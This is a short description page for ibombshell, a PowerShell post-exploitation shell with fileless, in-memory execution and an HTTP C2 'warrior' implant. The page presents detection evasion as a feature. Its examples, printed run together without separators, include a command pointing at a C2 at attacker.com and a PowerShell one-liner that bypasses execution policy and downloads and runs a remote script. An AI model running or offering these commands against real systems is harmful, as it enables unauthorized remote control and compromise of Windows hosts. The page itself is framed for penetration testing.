ibombshell
ibombshell is a dynamic remote shell tool written in PowerShell that provides post-exploitation functionalities loaded directly into memory. It offers two execution modes: Everywhere for direct shell access and Silently for C2-controlled warriors.
Description
ibombshell is a PowerShell-based tool designed for penetration testers during post-exploitation phases. It delivers a fully interactive shell with extensive pentesting features that are downloaded and executed directly in memory, avoiding disk writes and detection. The tool's 'Everywhere' execution mode provides immediate command prompt access with exploitation and post-exploitation capabilities available as PowerShell functions.
The tool also features a 'Silently' execution mode where a lightweight instance called 'warrior' connects back to a C2 panel over HTTP. This allows pentesters to remotely control compromised systems and dynamically load additional functions into memory as needed. This memory-only execution technique is particularly useful for maintaining persistence and evading endpoint detection.
ibombshell targets Windows environments through PowerShell execution, making it ideal for red team operations requiring stealthy command and control infrastructure.
How It Works
ibombshell operates through PowerShell execution in memory-only mode (fileless execution). In 'Everywhere' mode, the shell and its functions are downloaded directly to memory as PowerShell functions, providing immediate interactive access. In 'Silently' mode, a minimal 'warrior' instance establishes an HTTP connection to a C2 panel, enabling remote command execution and dynamic function loading into the compromised system's memory without creating persistent artifacts.
Installation
sudo apt install ibombshellExamples
sudo apt install ibombshellibombshell --mode everywhereibombshell --mode silently --c2 http://attacker.comibombshell --helpibombshell --mode everywhere --load-functionspowershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://c2/ibombshell.ps1')"